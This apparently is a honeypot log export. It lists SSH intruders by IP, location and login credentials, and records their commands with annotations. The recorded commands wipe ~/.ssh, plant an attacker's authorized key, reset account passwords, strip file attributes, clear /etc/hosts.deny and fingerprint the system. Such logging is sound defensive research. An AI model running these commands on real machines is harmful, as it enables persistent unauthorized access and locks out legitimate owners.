$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—5 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l Γ—5 // CPU profiling
$ echo -e "rancher\nw098xCUU0etL\nw098xCUU0etL"|passwd|bash
$ Enter new UNIX password: Γ—5
$ echo "rancher\nw098xCUU0etL\nw098xCUU0etL\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' Γ—5 // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' Γ—5
$ ls -lh $(which ls) Γ—5
$ which ls Γ—5
$ crontab -l Γ—5 // persistence setup
$ w Γ—5 // logged-in users check
$ uname -m Γ—5
$ cat /proc/cpuinfo | grep model | grep name | wc -l Γ—5 // CPU profiling
$ top Γ—5 // process monitoring
$ uname Γ—5 // OS identification
$ uname -a Γ—5 // OS/kernel identification
$ whoami Γ—5 // privilege check
$ lscpu | grep Model Γ—5
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}' Γ—5
$ echo -e "teacher\nMLgVEUB8bq1w\nMLgVEUB8bq1w"|passwd|bash
$ echo "teacher\nMLgVEUB8bq1w\nMLgVEUB8bq1w\n"|passwd
$ echo -e "rancher\nQwc6gOMtTghi\nQwc6gOMtTghi"|passwd|bash
$ echo "rancher\nQwc6gOMtTghi\nQwc6gOMtTghi\n"|passwd
$ echo -e "teacher\nqg8kN9l11P3l\nqg8kN9l11P3l"|passwd|bash
$ echo "teacher\nqg8kN9l11P3l\nqg8kN9l11P3l\n"|passwd
$ echo -e "1234qwer\n9zuTat058avx\n9zuTat058avx"|passwd|bash
$ echo "1234qwer\n9zuTat058avx\n9zuTat058avx\n"|passwd
🎭 wraith_root_9 (103.250.11.156) β€” Singapore, Singapore Β· 4 sessions Β· 79 cmds
2026-05-10 20:47 EDT Β· as rancher/rancher, root/Passw0rd1, scadmin/scadmin
Ran uname 4x across 4 sessions β€” automated OS fingerprinting.
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—4 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—4 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l Γ—4 // CPU profiling
$ echo -e "rancher\n9zHvKN5gz2t4\n9zHvKN5gz2t4"|passwd|bash
$ Enter new UNIX password: Γ—3
$ echo "rancher\n9zHvKN5gz2t4\n9zHvKN5gz2t4\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' Γ—4 // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' Γ—4
$ ls -lh $(which ls) Γ—4
$ which ls Γ—4
$ crontab -l Γ—4 // persistence setup
$ w Γ—4 // logged-in users check
$ uname -m Γ—4
$ cat /proc/cpuinfo | grep model | grep name | wc -l Γ—4 // CPU profiling
$ top Γ—4 // process monitoring
$ uname Γ—4 // OS identification
$ uname -a Γ—4 // OS/kernel identification
$ whoami Γ—4 // privilege check
$ lscpu | grep Model Γ—4
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}' Γ—4
$ echo -e "teacher\nIJ9MhswieL7F\nIJ9MhswieL7F"|passwd|bash
$ echo "teacher\nIJ9MhswieL7F\nIJ9MhswieL7F\n"|passwd
$ echo "root:UXOIr1WW3WYv"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; // execute from /tmp
$ echo -e "scadmin\npX0DbODfNk12\npX0DbODfNk12"|passwd|bash
$ echo "scadmin\npX0DbODfNk12\npX0DbODfNk12\n"|passwd
🎭 k-pop_root_7 (43.164.131.164) β€” Seoul, South Korea Β· 2 sessions Β· 40 cmds
2026-06-09 18:09 EDT Β· as rancher/rancher, teacher/teacher
Ran uname 4x across 4 sessions β€” automated OS fingerprinting.
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—2 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—2 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l Γ—2 // CPU profiling
$ echo -e "teacher\nt5ecT7eZaMoc\nt5ecT7eZaMoc"|passwd|bash
$ Enter new UNIX password: Γ—2
$ echo "teacher\nt5ecT7eZaMoc\nt5ecT7eZaMoc\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' Γ—2 // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' Γ—2
$ ls -lh $(which ls) Γ—2
$ which ls Γ—2
$ crontab -l Γ—2 // persistence setup
$ w Γ—2 // logged-in users check
$ uname -m Γ—2
$ cat /proc/cpuinfo | grep model | grep name | wc -l Γ—2 // CPU profiling
$ top Γ—2 // process monitoring
$ uname Γ—2 // OS identification
$ uname -a Γ—2 // OS/kernel identification
$ whoami Γ—2 // privilege check
$ lscpu | grep Model Γ—2
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}' Γ—2
$ echo -e "rancher\nq8y2ZnfnNFqF\nq8y2ZnfnNFqF"|passwd|bash
$ echo "rancher\nq8y2ZnfnNFqF\nq8y2ZnfnNFqF\n"|passwd
🎭 yankee_root_14 (69.169.110.131) β€” Secaucus, United States Β· 2 sessions Β· 40 cmds
2026-06-09 18:11 EDT Β· as rancher/rancher, teacher/teacher
Ran uname 4x across 4 sessions β€” automated OS fingerprinting.
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—2 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—2 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l Γ—2 // CPU profiling
$ echo -e "rancher\nQYAvTQ4xQFTD\nQYAvTQ4xQFTD"|passwd|bash
$ Enter new UNIX password: Γ—2
$ echo "rancher\nQYAvTQ4xQFTD\nQYAvTQ4xQFTD\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' Γ—2 // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' Γ—2
$ ls -lh $(which ls) Γ—2
$ which ls Γ—2
$ crontab -l Γ—2 // persistence setup
$ w Γ—2 // logged-in users check
$ uname -m Γ—2
$ cat /proc/cpuinfo | grep model | grep name | wc -l Γ—2 // CPU profiling
$ top Γ—2 // process monitoring
$ uname Γ—2 // OS identification
$ uname -a Γ—2 // OS/kernel identification
$ whoami Γ—2 // privilege check
$ lscpu | grep Model Γ—2
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}' Γ—2
$ echo -e "teacher\n1E3x4qe4fZrz\n1E3x4qe4fZrz"|passwd|bash
$ echo "teacher\n1E3x4qe4fZrz\n1E3x4qe4fZrz\n"|passwd
🎭 ghost_root_32 (58.27.230.131) β€” Lahore, Pakistan Β· 1 session Β· 4 cmds
2026-06-09 18:25 EDT Β· as user/1234
OS/kernel identification β†’ hostname discovery β†’ process termination
$ uname -a // OS/kernel identification
$ hostname // hostname discovery
$ uname -m&&pkill upnpsetup // process termination
$ sudo pkill upnpsetup // process termination
🎭 ghost_root_33 (45.43.137.130) β€” Warsaw, Poland Β· 1 session Β· 20 cmds
2026-06-09 18:13 EDT Β· as student1/student1
OS/kernel identification β†’ hostname discovery β†’ process termination
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo -e "student1\nFrDuyung9qdt\nFrDuyung9qdt"|passwd|bash
$ Enter new UNIX password:
$ echo "student1\nFrDuyung9qdt\nFrDuyung9qdt\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 ghost_root_34 (104.244.74.84) β€” Roost, Luxembourg Β· 1 session Β· 20 cmds
2026-06-09 18:03 EDT Β· as cache/cache
OS/kernel identification β†’ hostname discovery β†’ process termination
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo -e "cache\nc7FtjYhCKfhk\nc7FtjYhCKfhk"|passwd|bash
$ Enter new UNIX password:
$ echo "cache\nc7FtjYhCKfhk\nc7FtjYhCKfhk\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 cipher_root_29 (139.198.113.29) β€” Hong Kong, Hong Kong Β· 1 session Β· 20 cmds
2026-06-09 18:02 EDT Β· as ubuntu/1q2w3e
OS/kernel identification β†’ hostname discovery β†’ process termination
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo -e "1q2w3e\nmWA8Y3YmPZcK\nmWA8Y3YmPZcK"|passwd|bash
$ Enter new UNIX password:
$ echo "1q2w3e\nmWA8Y3YmPZcK\nmWA8Y3YmPZcK\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 yankee_root_15 (20.124.91.101) β€” Boydton, United States Β· 1 session Β· 19 cmds
2026-06-09 16:40 EDT Β· as root/Root9999
OS/kernel identification β†’ hostname discovery β†’ process termination
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo "root:yV9rTNSue4bu"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 chai_root_6 (20.193.141.133) β€” Pune, India Β· 3 sessions Β· 60 cmds
2026-05-08 11:01 EDT Β· as jason/jason123, smokeping/smokeping123, ubuntu/Ubuntu@123
OS/kernel identification β†’ hostname discovery β†’ process termination
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—3 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—3 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l Γ—3 // CPU profiling
$ echo -e "smokeping123\nTa2sSsSxRdmT\nTa2sSsSxRdmT"|passwd|bash
$ Enter new UNIX password: Γ—3
$ echo "smokeping123\nTa2sSsSxRdmT\nTa2sSsSxRdmT\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' Γ—3 // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' Γ—3
$ ls -lh $(which ls) Γ—3
$ which ls Γ—3
$ crontab -l Γ—3 // persistence setup
$ w Γ—3 // logged-in users check
$ uname -m Γ—3
$ cat /proc/cpuinfo | grep model | grep name | wc -l Γ—3 // CPU profiling
$ top Γ—3 // process monitoring
$ uname Γ—3 // OS identification
$ uname -a Γ—3 // OS/kernel identification
$ whoami Γ—3 // privilege check
$ lscpu | grep Model Γ—3
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}' Γ—3
$ echo -e "jason123\nBPBIkVv8DYiX\nBPBIkVv8DYiX"|passwd|bash
$ echo "jason123\nBPBIkVv8DYiX\nBPBIkVv8DYiX\n"|passwd
$ echo -e "Ubuntu@123\nrla7NCftJYdn\nrla7NCftJYdn"|passwd|bash
$ echo "Ubuntu@123\nrla7NCftJYdn\nrla7NCftJYdn\n"|passwd
🎭 jade_pi (14.103.112.112) β€” Beijing, China Β· 1 session Β· 20 cmds
2026-06-09 15:45 EDT Β· as smokeping/smokeping123
OS/kernel identification β†’ hostname discovery β†’ process termination
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo -e "smokeping123\nFG6eEszuusd3\nFG6eEszuusd3"|passwd|bash
$ Enter new UNIX password:
$ echo "smokeping123\nFG6eEszuusd3\nFG6eEszuusd3\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 phantom (185.203.236.212) β€” Tashkent, Uzbekistan Β· 1 session Β· 20 cmds
2026-06-09 15:24 EDT Β· as jason/jason123
OS/kernel identification β†’ hostname discovery β†’ process termination
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo -e "jason123\nw1xznl3mNuys\nw1xznl3mNuys"|passwd|bash
$ Enter new UNIX password:
$ echo "jason123\nw1xznl3mNuys\nw1xznl3mNuys\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 panda_root_3 (122.114.255.230) β€” Zhengzhou, China Β· 1 session Β· 15 cmds
2026-06-09 14:54 EDT Β· as ftp2/password
OS/kernel identification β†’ hostname discovery β†’ process termination
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo -e "password\n9GhbkuGCpti1\n9GhbkuGCpti1"|passwd|bash
$ Enter new UNIX password:
$ echo "password\n9GhbkuGCpti1\n9GhbkuGCpti1\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
🎭 toucan (129.121.32.44) β€” Vinhedo, Brazil Β· 1 session Β· 1 cmd
2026-06-09 13:59 EDT Β· as jimster/jimster$123
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ uname -a // OS/kernel identification
🎭 panda_root_4 (140.246.70.45) β€” Jinan, China Β· 1 session Β· 20 cmds
2026-06-09 12:29 EDT Β· as usuario2/123456
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo -e "123456\naciunBZIGRzU\naciunBZIGRzU"|passwd|bash
$ Enter new UNIX password:
$ echo "123456\naciunBZIGRzU\naciunBZIGRzU\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 wok_root (182.61.54.90) β€” Beijing, China Β· 1 session Β· 1 cmd
2026-06-09 09:57 EDT Β· as root/123Jimster
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ uname -a // OS/kernel identification
🎭 cipher (95.240.192.149) β€” Volla, Italy Β· 1 session Β· 20 cmds
2026-06-09 09:10 EDT Β· as domaindnszones/domaindnszones123
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
